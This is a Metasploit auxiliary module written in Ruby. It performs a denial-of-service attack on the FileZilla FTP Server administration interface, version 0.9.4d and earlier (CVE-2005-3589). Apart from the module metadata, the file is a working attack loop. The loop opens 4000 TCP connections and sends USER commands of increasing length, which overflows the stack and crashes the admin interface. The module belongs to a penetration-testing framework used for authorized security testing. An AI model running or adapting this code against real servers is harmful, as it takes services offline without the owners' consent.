class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'FileZilla FTP Server Admin Interface Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the FileZilla FTP
Server Administration Interface in versions 0.9.4d and earlier.
By sending a procession of excessively long USER commands to the FTP
Server, the Administration Interface (FileZilla Server Interface.exe)
when running, will overwrite the stack with our string and generate an
exception. The FileZilla FTP Server itself will continue functioning.
},
'Author' => [ 'aushack' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '15346' ],
[ 'CVE', '2005-3589' ],
[ 'EDB', '1336' ],
[ 'OSVDB', '20817' ]
],
'DisclosureDate' => '2005-11-07'))
end
def run
print_status("Sending 4000 packets, this may take a while.")
4000.times do |x|
connect
sock.put("USER #{"A" * x}\r\n")
disconnect
end
end
end